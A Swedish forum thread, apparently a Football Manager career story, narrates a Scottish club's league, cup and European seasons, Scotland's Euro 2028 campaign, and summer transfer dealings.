Precis som tidigare år så kan vi vid juluppehållet avgöra vilka lag som kommer top 2. Rangers har redan halkat efter och det står mellan oss och Henrik Larssons Celtic. I båda cuperna får vi respass i semifinalerna mot Rangers respektive Celtic. Inte så konstigt då vi luftar truppen i de cuperna. När fem matcher återstår och vi går in i mästerskapsserien så är vi två poäng efter Celtic. Nästa match var på Celtic Park, en sorts ligafinal. Den matchen förlorar vi och ligaguldet känns förlorat. Omgång 35 vinner vi båda och det skiljer fem poäng med tre matcher kvar. I de nästkommande två så lyckas Celtic bara ta en poäng och vi snor åt oss alla sex. Det innebär att vi övertar serieledningen inför sista dagen. En superchans som kommer oväntat. Men vi kan inte få in bollen borta mot Aberdeen utan förlorar med 1-0 och förlorar ligatiteln för första gången på tre år. Inga titlar i år alltså för första gången sen jag tillträdde.

. .

Europaspel

Skrämmande likt förra året så börjar vi CL med en svag hemmaförlust efter ett sent vinstmål från Atletico Madrid. Vi följde precis som förra året upp det med ett starkt kryss borta mot Bayern. Återigen efter ett sent baklängesmål. Kampanjen fortsatte med ett dubbelmöte mot lagets sämsta lag, Dinamo Zagreb. Sex poäng och 7-0 skickar upp oss på andra plats och på sju poäng. Men efter ännu en förlust mot Atletico, ännu en gång med ett mål i slutet så behöver vi besegra Bayern hemma för att gå vidare. Väl där får vi inte in bollen och förlorar med 0-1 efter straff och vårt europaäventyr fortsätter i EL.

. .

PAOK lottades vi mot och det blev som väntat ett enkelt dubbelmöte. 2-0 och 3-0 ger oss 5-0 och avancemang. Lille stod för motståndet. Hemmamatchen är kanske klubbens värsta match under min ledning. 0-4 hinner Lille gå upp i utan att egentligen skapa så mycket. Vi får in 1-4 i slutet men hoppet känns kört. Vi vinner ändå matchen på xG och hela säsongen i Europa slutar i ett antiklimax. Nåväl, returen ska ändå spelas och vi reser till Lille med lite hopp. Väl där så inleder vi starkt, 0-1 efter endast sex minuter. Fem minuter senare får vi straff och hoppet tänds. Straffen missas dock men vi fortsätter trycka på. Minuter rinner iväg snabbt och vi går till paus med ett stort spelmässigt övertag men endast ett 0-1 överläge. I andra halvlek tappar vi hoppet och därmed skapar vi färre chanser. Istället kan Lille vända matchen och vinna med 2-1 i en match som vi återigen vinner på xG. Det verkar klart att målskyttet är ett stort problem.

. .

När säsongen summeras så kan två klara slutsatser dras. Försvaret är bättre än på länge. Vi släpper enbart in 15 mål på 38 ligamatcher. I Champions League så släpper vi in sex mål på sex matcher. Det som däremot saknas är målskyttet. Nyförvärvet Gonzalo Plata vinner både skytteligan och assistligan med råge. Han gör 26+15 på lite över 3 200 minuter. Men där bakom är det skralt. Darren Milne gör förvisso 14 mål i alla tävlingar men ingen av våra tre forwards kommer upp i tio mål. Där måste det till bot och bättring. Men jag tror jag ger våra unga skotska forwards en säsong till på sig att leverera innan nyförvärv plockas in.


   
raca14 reacted
SvaraCitera
(@classisco)
Eminent Member
Blev medlem: 3 år sedan
Inlägg: 30
Topic starter  

. .

Skottland - efter VM

Efter ett VM som överträffade våra förväntningar så var den enda vägen uppåt. Nations League väntade men det var utan Andy Robertson som avslutar sin landslagskarriär. Det innebär att Kieran Tierney äntligen får spela på sin föredragna position. I övrigt ser truppen spännande ut. Majoriteten av truppen är i början av sina karriär och jag ser inte varför vi inte skulle lyckas med ett liknande mästerskap i framtiden. Men Belgien, Serbien och Ryssland väntade i Nations League nu.

Match 1 slutar med förlust hemma mot Belgien. Kanske var det lite baksmälla från VM. Men efter det vaknar vi till. Vi vinner de fem avslutande matcherna och säkrar därmed förstaplatsen i gruppen och ett Nations League slutspel.

. .

Väl i slutspelet så tar vår framfart slut. Två raka förluster mot Frankrike och Spanien ger oss en fjärdeplats och tar ner oss på jorden litegrann. Vår position i världsfotbollen känns ganska klar nu. Vi klarar av de mellanbra lagen men när det kommer till de stora drakarna så får vi problem.

EM-kval

Vi lottades in i en väldigt enkel grupp eftersom vi nu tillhör den första seedningsgruppen. Det enda riktiga hotet var Norge som stoltserade med två av världens bästa spelare i Håland och Ödegård. Utöver det så är deras trupp svag och Norge har haft svår att kvalificera sig för mästerskap. Kvalet städar vi av ganska enkelt med 7 vinster av åtta möjliga. Den enda plumpen var borta mot Norge då vi drar på oss straff i minut 91 och förlorar med 1-0. Vi kvalificerar oss iallafall som gruppsegrare med endast två mål insläppta och vi är klara för EM där vi kommer möta Norge, Österrike och England.

. .

Spoiler
Matcher 2027
. .

Truppen inför EM

. .


   
SvaraCitera
(@classisco)
Eminent Member
Blev medlem: 3 år sedan
Inlägg: 30
Topic starter  

. .

EM 2028

Lottade in i en grupp med England, Norge och Österrike borde betyda avancemang. Fyra poäng skulle krävas, kanske till och med tre om vi hade tur. Eftersom 16 av 24 lag går vidare går alltså de fyra bästa treorna vidare. Premiären skulle gå mot gruppens sämst rankade lag, Norge. Ett Norge som vi både besegrat och förlorat mot i föregående kval.

??????? SCO - NOR ??

Precis som i föregående kvalspel så tog vi det lite mer försiktigt mot lag som är jämbördiga. Förvisso bör vi vara starkare än Norge, men knappt. Offensivt har vi haft problem, defensiven är jag däremot fullt säker på. Efter ungefär en halvtimmes trevande spel där båda lagen känt på varandra så får vi en straff. Lagets kanske bäste spelare Billy Gilmour gör inga misstag utan placerar in 1-0. Väldigt skönt då matchen varit ganska chansfattig trots vårt övertag bollmässigt. Vi fortsätter på samma inslagna väg, mycket boll och väldigt få chanser åt båda håll.

Efter timmen spelad så gör kapten Tierney 2-0 och slår hål på alla chanser till comeback för Norge. Vi spelar av matchen och vinner med 2-0 i premiären.

??????? SCO - ENG ???????

Dags för Auld Enemy och en tidig gruppfinal. En härlig match att få så här i EM. Vi har egentligen allt att vinna här, engelsmännen ska ta hem det här. Precis som i förra matchen så börjar vi med att vara lite försiktiga. Den här gången är det dock England som gör målet efter halvtimmen. Foden och Mount kombinerar och gör ett världsklassmål. Lite synd då vi varit det bättre laget fram tills dess. Vi gör ett försök att trycka på gaspedalen men England står emot bra och matchen slutar 0-1 trots både chansövertag och övertag i xG för oss. Återigen börjar målskytteproblematiken lysa.

??????? SCO - AUT ??

Sista matchen i gruppen skulle bli den viktigaste. Vi gick in i den som tredjeplacerade lag. Österrike hade också vunnit mot Norge med två bollar men hade fler gjorda mål än oss. En vinst skulle krävas för att ta en automatisk plats vidare. En poäng betyder avancemang som tredjelag medan en förlust med all sannolik skulle skicka ut oss.

Österrike hade imponerat tidigare och endast förlorat mot England efter två sena mål. Men nu är det vi som startar bäst genom Kieron Bowie. 1-0 efter fem minuter blir 1-1 efter halvtimmen spelad. Efter det blir det en konstig match. Österrike är nöjda med resultat och vi blir lite rädda för att satsa framåt då ett baklängesmål skulle innebära uttåg. Matchen spelas bara av och slutar 1-1 där inget lag når upp till 0,60 i xG. 

. .

SLUTSPEL

??????? SCO - POR ??

En tredjeplats skulle oundvikligt innebära en tuff lottning, och en tuff lottning blev det. Portugal är inte att leka med. Efter att dom inte kvalificerat sig till VM 2026 så har dom vunnit varje match utom 1. Ett facit som blir svårt att matcha. Men vi vet att vi kan slå stora lag på den stora scenen. Återigen inleder vi med en lite försiktigare approach för att sedan höja tempot. Matchen är jämn och chanserna kommer åt båda håll. Efter 33 minuter är det Portugal som bryter dödläget med 1-0. Vi höjer tempot och börjar skapa fler chanser. Portugal är dock farliga på kontringen och formar alltid ett hot.

Vi har en straff dömd som VAR senare ändrar till en frispark. Billy Gilmour har ett skott i stolpen och McBurnie missar en nick från nära håll. Närmare än så kommer vi inte utan vi förlorar en match som statistikmässigt är ganska jämn. Tråkigt med uttåg redan i åttondel, speciellt då det är en match som vi lika gärna kunde ha vunnit. En sån här match vann vi i VM.

Det ska sägas att Österrike som kom tvåa i vår grupp fick en lika tuff lottning med Holland, en match som dom förlorade med 1-3. Ett Holland som vinner EM mot Danmark i finalen. Även gruppsegraren England får respass i åttondelen mot Serbien. 

. .

 


   
SvaraCitera
(@classisco)
Eminent Member
Blev medlem: 3 år sedan
Inlägg: 30
Topic starter  

. .

Inför 2028/2029

Den här sommaren kom att handla om att försöka behålla våra nyckelspelare. Ryggraden i laget var jag inte särskilt rädd för. Våra inhemska spelare älskar klubben och kommer aldrig lämna verkar det som. Däremot våra nyckelspelare med spets börjar titta ut mot Europa. Stankov har en klausul på 215 miljoner som bara väntar på att triggas. Barreto har en klausul på 285 miljoner och Uribes nya kontrakt har en låg klausul på precis över 100 miljoner. 

Redan i mitten av juni har fyra spelare sålts. Tre reservspelare där backup-högerbacken Denholm var den mest namnkunniga. Men ett monsterbud på vår vänsterback Ngwenya kommer från Luton. Han har blivit andraval där på sistone så 210 miljoner kronor accepterar vi med glädje. Stankovs klausul har redan triggats av ett tiotal lag men ännu har han inte bestämt sig.

Sheffield United triggar Barretos klausul på 285 miljoner och den sista juni skriver han på för the Blades. En och en halv säsong blev det bara för honom här och vi gör en profit på 175 miljoner. Den första juli så gör vi klart med tre ersättare, alla på fri transfer från engelska toppklubbar. Scott på vänsterbacken har vi haft koll på länge men hans utveckling har stagnerat av brist på speltid. Förhoppningsvis kan vi revitalisera hans karriär här med lite speltid. Samma gäller också för Thomson på högerbacken. Fördelen med honom är att han kan lira lite överallt på den defensiva halvan av planen. Mittback, ytterback och innermitt. Jamie Horne är den kanske mest spännande, endast 19 år och redan kommer han känna på speltid. Han kommer in som en långsiktig ersättare till Stankov.

Juli passerar och inget av värde händer, backup-keepern Harry Stone lämnar för Hamilton och kommer för första gången få lite speltid. Precis då serien startat så plockar vi in vår enda värvning för pengar. Vänsteryttern Daniel Rapetti ansluter från Boca Juniors för 80 miljoner. En liten nedgradering från Barreto som lämnar, men Rapetti är bättre nu än vad Barreto var när han kom. Så förhoppningsvis kan argentinaren få en lika fin utvecklingskurva. Boyan Stankov, ligans bästa spelare fortsätter att tacka nej till kontrakt från stora klubbar. PSG, Real, Bayern och Chelsea får alla nobben av bulgaren. Trist nog så vägrar han även att förlänga med oss.

När deadline day kommer och jag har börjat räkna in honom i truppen för kommande säsong så händer det, Real Madrid triggar klausulen för tredje (kanske fjärde) gången under fönstret och han accepterar kontraktet. Stankov lämnar och hamnar direkt i La Ligas drömelva inför säsongen med en värdering på 520 miljoner. Aj.

Spoiler
Övergångar
. .

. .

. .

Champions League-kval

I och med att vi inte vinner serien förra året så får vi kvala i den tuffa "League Path". Shaktar väntar i dubbelmöte 1 av 2. 7-0 hemma och vi visar vart skåpet ska stå och att vi är ett starkare lag än ifjol. I playoff så väntar Bayern München. Av någon outgrundlig anledning så spelar Bayern alltså CL-kval. Ett Bayern som vunnit 14/16 av de senaste ligorna. Trots det så vinner vi hemmamatchen med hela 5-2. Bortamötet slutar 3-1 till Bayern efter ett sent bombardemang. Vi vinner alltså dubbelmötet med 6-5 och spelar CL igen. Roligt också att Celtic i kraft av ligavinsten ifjol spelar gruppspel. Första gången under min tid som två skotska lag spelar gruppspel.

Vi lottas återigen i en svår grupp. Chelsea, Juventus och Beşiktaş.

. .

Truppen 2028/29

. .


   
SvaraCitera
(@classisco)
Eminent Member
Blev medlem: 3 år sedan
Inlägg: 30
Topic starter  

. .

Säsongen 2028/2029

Hösten kom att handla om två saker. Dels våra enormt fina resultat i både ligan och i Europa. Men även om rykten bort för våra nyckelspelare. Mittbacken Uribe sitter på en låg utköpsklausul som jag hela tiden bumpar upp lite med nya kontrakt. Nu har den höjts från 110 till 170 miljoner. Fortfarande en alldeles för låg summa för en spelare av hans kaliber. Även Plata budas det på för cirka 350 miljoner. Unge Robson på topp, vårt egenproducerade underbarn bombardes med bud på 10-15 miljoner. Summor som är alldeles för låga för oss, men Robson vill lämna. Tillslut sätter han sig på tvären och vi tvingas sälja honom för ynka 20 miljoner till Chelsea. Även Darren Milne lämnar för 130 miljoner. In kommer (på hela truppens begäran) två nya forwards. Nästan helt oscoutade kommer två landslagsforwards in. En 23-åring från Tjeckien och en 19-åring från Uruguay. Även Josh Adam värvas tillbaka för cirka 40 miljoner mindre än vad han såldes för 18 månader tidigare.

Men i ligan stormar vi fram under hösten, formen avtar dock kraftigt under våren. Som så många gånger förr så tappar vi helt farten på våren och vi tvingas till en ligafinal mot Celtic i omgång 37. Vi vinner den med 2-1 och säkrar titeln. Det blir en inhemsk dubbel då vi även vinner cupen.

Spoiler
Övergångar
. .

. .

EUROPASPEL

En svår grupp igen men vi var stärkta av segern över Bayern i kvalet. Juve väntade först hemma, en match vi vinner med 2-1. Oerhört viktigt då Juve är det laget vi måste besegra om vi ska vidare. Chelsea borta blir jobbigt, vi torskar med 4-0 och kommer direkt ner på jorden. Vi kan inte spela vårt spel borta mot de stora drakarna, det är tydligt. Besiktas besegras två gånger om och vi är i en guldsits inför de två sista matcherna. Vi har 9p, Juve har 3p. En poäng behövs och krävs för att gå vidare. Juve har oss och Besiktas kvar och där lär dom ta 3p mot Besiktas.

Borta i Turin så har Gonzalo Plata bestämt sig för att gå vidare. Juve tar ledningen tre gånger om i första halvlek men Plata svarar också tre gånger om. 3-3 i paus efter 2+1 av just nämnde Plata. I andra halvlek kompletterar han sin statistikrad med att fullborda sitt hattrick. 3-4 vinst borta i Turin och vi är vidare! Sista matchen mot Chelsea var av mindre betydelse då vi behövde överkomma ett underläge på 0-4 för att gå förbi på inbördes möten. 1-1 spelar vi dock med en man mindre och vi slutar tvåa i gruppen och lottas mot Dortmund.

. .

I första matchen så håller vi jämna steg med Dortmund, matchen ser ut att sluta 1-1 då vi gör ett sent mål. Perfekt med vinst hinner jag tänka innan Dortmund kvitterar i minut 93. Nåja, 2-2 mot Tysklands nu bästa lag är inte fy skam. Blir bara jobbigt att behöva vinna returen. I returen väljer jag att backa hem och kontra för att på så sätt sno åt mig en 1-0 seger. Planen funkar ok, vi håller tätt men skapar inte så mycket framåt. När jag, efter en timme, sitter och funderar på att börja trycka fram laget så gör Dortmund 1-0. Laget trycks fram, 2-0 görs, 2-1 görs och vi är halvt med i matchen. I ett sista försök att tvinga fram förlängningen kastar vi fram allt. Det blir också mål, men i fel bur och vi åker ur med sammanlagt 5-3. Vi åker mot Dortmund som kommer att vinna tävlingen senare.

. .


   
LeoFM reacted
SvaraCitera
Sida 2 / 2
Share: